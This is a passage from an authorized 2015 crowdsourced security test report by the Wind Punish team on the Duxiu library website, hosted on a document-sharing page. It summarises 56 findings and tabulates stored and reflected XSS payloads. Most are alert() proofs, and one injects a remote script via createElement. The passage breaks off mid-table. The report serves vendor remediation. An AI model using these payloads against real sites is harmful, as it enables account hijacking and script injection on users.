众测报告-WindPunish安全试验室.DOC

  1. 1、本文档共11页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
众测报告-WindPunish安全试验室

读秀网站安全检测报告 机构:Wind Punish网络安全团队 时间:2015年11月29日 版本 V1.0 密级 商密 修订人员 crown prince 版本 V2.0 密级 商密 修订人员 Wind Punish核心成员组 版本 V3.0 密级 商密 修订人员 路人甲007 目录 检测概述 3 检测涉及范围 3 漏洞类型统计 3 漏洞详细描述 4 XSS漏洞 4 SQL注入 6 存在爆破风险 8 其他漏洞 9 修复建议 10 结束语 10 1.检测概述: Wind Punish网络安全团队共24名成员参与本次众测,于2015年11月21日 至28日期间获得读秀网()授权,并在该期间对读秀网站进行安全检测。 2.检测涉及范围: 以及读秀其他web界面 本次报告共检测出漏洞56处,其中高危2处、中危52处、低危2处。 注:高中危漏洞应及时修复、低危为建议修复。 3.漏洞类型统计 34处XSS漏洞 (中危) 18处其他类型(未授权访问,越权下载,信息泄露,CSRF的)漏洞 (中危) 2处SQL注入漏洞 (高危) 2处存在爆破风险的漏洞 (低危) 共计:56处漏洞 4.漏洞详细描述 ①XSS漏洞 反射型XSS:18处 存储型XSS:16处 共计:34处XSS漏洞 注: 表格中标明XSS语句,以帮助厂商进行针对性过滤。 WP对读秀进行的是全方位的安全众测,故不同成员提交的同一URL如果存在多种差别较大的XSS语句,我们视为不同漏洞。 XSS漏洞类型 XSS链接/XSS方式 XSS语句 短消息存储型XSS /a/sxxxMsg.action?xxx =xxx input onmousemove=alert(1) 个人主页存储型XSS /a/xxxx?uid=xxxxxx=xsseng \x22\x3e\x3cinput oninput=alert\x281\x29\x3e 论坛存储型XSS /xxx/7061/xxx.htm 上传处提交[RAR]javascript:alert(1)|txt[/RAR] 论坛中针对IE内核的XSS 上传txt可以直接触发xss 评论处存储型XSS /repository/xxxrites/xxxx/xxxnfo.xxxx?repid=11xxxfavid=xxx img src=x onerror=s=createElement(script);body.appendChild(s);s.src=/RUnjBEG; 留言板存储型XSS /xxxx/repositoryMsg/xxxx?repid=178354 input oninput=alert(1) 个人主页存储型XSS-2 /xxxxx img src=1 onerror=alert(location.href) 个人主页html代码标签读取 进入个人图书馆,新建分类。 axss/a 短消息存储型XSS-2 将XSS语句发送给被攻击方,触发指定型存储XSS /textareaimg?src=# onerror=alert(/xss/) 论坛存储型XSS-2 /topic/xxx/xxx.htm /textareaimg?src=# onerror=alert(/xss/) 个人主页存储型XSS-3 /xxx/xxx?uid=xxxx “img src = 1 onerror = alert(/in2/) 评论处存储型XSS-2 /xxx/favorites/xxx/repFavInfo.jspx?repid=183079xxxx=6788832 /liimg onerror=alert(/in2/) src=# 反馈处存储型XSS /xxxx.jsp 未过滤 个人主页存储型XSS-4 img src=1 onerror=alert(/1/) 留言板存储型XSS-2 推荐处可提交XSS代码,造成存储型XSS 未过滤 个人主页,新建分类处存储型XSS /a/xxx?uidname=xxx 个人主页新建分类时,分类名未过滤 反射型XSS /xxx.aspx?id=55wd=xss onmousemove=alert(1) x=x xss onmousemove=ale

文档评论(0)

xiaozu + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档